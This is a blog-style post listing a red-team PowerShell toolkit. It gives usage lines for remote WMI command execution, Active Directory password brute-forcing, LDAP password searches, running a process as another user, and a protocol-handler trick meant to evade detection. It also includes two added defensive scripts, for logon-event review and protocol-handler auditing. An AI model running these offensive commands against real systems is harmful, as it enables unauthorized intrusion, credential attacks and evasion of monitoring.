Commonly Used Red Team PowerShell Scripts
VSole, 2022-08-08 22:25:53
Various commonly used PowerShell scripts:
Search-EventForUser.ps1: PowerShell script that searches the Windows event logs for a specific user
Search-FullNameToSamAccount.ps1: resolves a full name to a SamAccountName
Search-UserPassword.ps1: searches the userPassword field in LDAP
Remote-WmiExecute.ps1: executes commands remotely using WMI
Take-Screenshot.ps1: takes a screenshot (PNG)
Get-BrowserHomepage.ps1: gets the browser homepage
Get-IEBookmarks.ps1: lists all Internet Explorer bookmark URLs
Invoke-ADPasswordBruteForce.ps1: tests user passwords
Utility.ps1: contains several cmdlets
Run-As.ps1: runs a process as another user (credentials)
Get-ProcessList.ps1: lists processes, their owners and command-line arguments
Remote-RegisterProtocolHandler.ps1: runs your command through a protocol handler to bypass some detections
Add-UserLogonScript: adds a logon script for a specific user
Search-EventForUser.ps1 usage
Import-Module .\Search-EventForUser.ps1; Search-EventForUser -TargetUser "MrUn1k0d3r"
Import-Module .\Search-EventForUser.ps1; "MrUn1k0d3r" | Search-EventForUser
Import-Module .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01
Import-Module .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -FindDC true
Import-Module .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true
Import-Module .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true -Username DOMAIN\admin -Password "123456"
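The same kind of search is a routine log-review task for an incident responder. The following is an added example written for this page, not code from the script collection above: it pulls successful logon events (Security event 4624) for one account from a host and reads the event fields by name. The function name Find-LogonEventForUser, the hypothetical account and host names in the usage lines, and the assumption that the caller can read the Security log on the target host (local Administrators or the Event Log Readers group) are all mine.

```powershell
# Added example, not part of the script collection: list successful logons
# (Security event 4624) for one account on a host, for log review.
# Assumes the caller can read the Security log on $ComputerName
# (local Administrators or the Event Log Readers group).
function Find-LogonEventForUser {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string]$TargetUser,
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$MaxEvents = 5000
    )
    process {
        $filter = @{ LogName = 'Security'; Id = 4624 }
        # SilentlyContinue: Get-WinEvent raises an error when no event matches the filter.
        Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
            ForEach-Object {
                # Read the EventData fields by name instead of relying on property positions.
                $data = @{}
                foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
                if ($data['TargetUserName'] -ieq $TargetUser) {
                    [pscustomobject]@{
                        Time        = $_.TimeCreated
                        Computer    = $ComputerName
                        User        = '{0}\{1}' -f $data['TargetDomainName'], $data['TargetUserName']
                        LogonType   = $data['LogonType']   # 2 interactive, 3 network, 10 RDP, ...
                        SourceIP    = $data['IpAddress']
                        Workstation = $data['WorkstationName']
                    }
                }
            }
    }
}

# Usage (hypothetical account and host names):
#   Find-LogonEventForUser -TargetUser 'jdoe' -ComputerName 'DC01' | Format-Table -AutoSize
#   'jdoe', 'svc-backup' | Find-LogonEventForUser | Group-Object User, LogonType
```

Filtering on the event ID server-side with -FilterHashtable and only then matching the user name client-side keeps the query cheap on a busy domain controller; grouping the results by LogonType and SourceIP is usually the quickest way to spot a logon from an unexpected workstation.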
Search-FullNameToSamAccount.ps1 usage
Import-Module .\Search-FullNameToSamAccount.ps1; Search-FullNameToSamAccount -Filter *god*
Import-Module .\Search-FullNameToSamAccount.ps1; "god", "mom" | Search-FullNameToSamAccount
Search-UserPassword.ps1 usage
Import-Module .\Search-UserPassword.ps1; Search-UserPassword -Username *god*
Import-Module .\Search-UserPassword.ps1; "god", "mom" | Search-UserPassword
Remote-WmiExecute.ps1 usage
Import-Module .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"
Take-Screenshot.ps1 usage
Import-Module .\Take-Screenshot.ps1; Take-Screenshot -Path C:\test.png
Get-BrowserHomepage.ps1 usage
Import-Module .\Get-BrowserHomepage.ps1; Get-BrowserHomepage
Get-IEBookmarks.ps1 usage
Import-Module .\Get-IEBookmarks.ps1; Get-IEBookmarks
Invoke-ADPasswordBruteForce.ps1 usage
Import-Module .\Invoke-ADPasswordBruteForce.ps1; Invoke-ADPasswordBruteForce -Username "mr.un1k0d3r" -Password "password"
Import-Module .\Invoke-ADPasswordBruteForce.ps1; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password"
Import-Module .\Invoke-ADPasswordBruteForce.ps1; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password" -Domain MATRIX
Utility.ps1 usage
Search-EventForUser
Search-EventForUserByDomain
Search-EventForUserByIP
Search-FullNameToSamAccount
Ldap-GetProperty
Search-UserPassword
Dump-UserEmail
Dump-Computers
Dump-UserName
Run-As.ps1 usage
Import-Module .\Run-As.ps1; Run-As -Username RingZer0\Mr.Un1k0d3r -Password "IShouldNotLeakThisPasswordOnTheInternet" -Process "C:\Evil.exe"
COM-Utility.ps1 usage
Invoke-COM-ScheduleService
Invoke-COM-XMLHTTP
Invoke-COM-ShellBrowserWindow
Invoke-COM-WindowsScriptHost
Invoke-COM-ProcessChain
Invoke-COM-ShellApplication
Get-ProcessList.ps1 usage
Import-Module .\Get-ProcessList.ps1; Get-ProcessList
Remote-RegisterProtocolHandler.ps1 usage
This cmdlet creates a protocol handler that will invoke your payload. The idea is to avoid detection, because the command that actually gets executed looks like this: explorer ms-browse://
where ms-browse is the custom handler you registered, and it will execute your command.
Import-Module .\Remote-RegisterProtocolHandler.ps1; Remote-RegisterProtocolHandler -ComputerName host -Payload "command to run"
Import-Module .\Remote-RegisterProtocolHandler.ps1; Remote-RegisterProtocolHandler -ComputerName host -Payload "command to run" -Handler ms-handler-name
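From the defender's side, a handler registered this way leaves a durable artifact: a class key under HKEY_CLASSES_ROOT carrying a "URL Protocol" value, whose shell\open\command points at the command that "explorer ms-browse://" ends up running. The following is an added example written for this page, not code from the script collection: it enumerates every registered URL protocol handler on the local host, prints the command behind each one, and flags commands that run through a script host or from a user-writable path. The function name Get-UrlProtocolHandler, the exclusion list of well-known protocols and the "suspicious" pattern are my own choices; any interactive user can read HKEY_CLASSES_ROOT, so no elevation is assumed.

```powershell
# Added example, not part of the script collection: audit registered URL
# protocol handlers on the local host. HKEY_CLASSES_ROOT merges machine-wide
# (HKLM) and per-user (HKCU) classes, so handlers planted in either scope show up.
function Get-UrlProtocolHandler {
    [CmdletBinding()]
    param(
        # Well-known protocols that are expected on any Windows host (my own list; extend for your estate).
        [string[]]$Exclude = @('http', 'https', 'ftp', 'mailto', 'file', 'tel', 'ms-settings', 'microsoft-edge')
    )
    Get-ChildItem -Path 'Registry::HKEY_CLASSES_ROOT' -ErrorAction SilentlyContinue |
        Where-Object { $_.Property -contains 'URL Protocol' } |   # only keys that declare a protocol handler
        ForEach-Object {
            $proto = $_.PSChildName
            if ($Exclude -contains $proto) { return }
            # The launched command lives in the (default) value of shell\open\command.
            $cmdKey  = Join-Path $_.PSPath 'shell\open\command'
            $command = $null
            if (Test-Path $cmdKey) {
                $command = (Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue).'(default)'
            }
            [pscustomobject]@{
                Protocol   = $proto
                Command    = $command
                # Script hosts, LOLBins and user-writable directories behind a protocol handler deserve a second look.
                Suspicious = [bool]($command -match '(?i)cmd\.exe|powershell|wscript|cscript|mshta|rundll32|regsvr32|\\Users\\|\\Temp\\|AppData')
            }
        }
}

# Usage: review everything, or only the flagged entries.
#   Get-UrlProtocolHandler | Sort-Object Protocol | Format-Table -AutoSize
#   Get-UrlProtocolHandler | Where-Object Suspicious | Format-List
```

Running the audit periodically and diffing the output against a known-good baseline is more reliable than the pattern match alone, since a handler can launch a benign-looking binary that in turn loads the real payload. Registry auditing (Sysmon event 12/13 on HKCR or HKLM\SOFTWARE\Classes keys containing "URL Protocol") gives the same visibility in near real time.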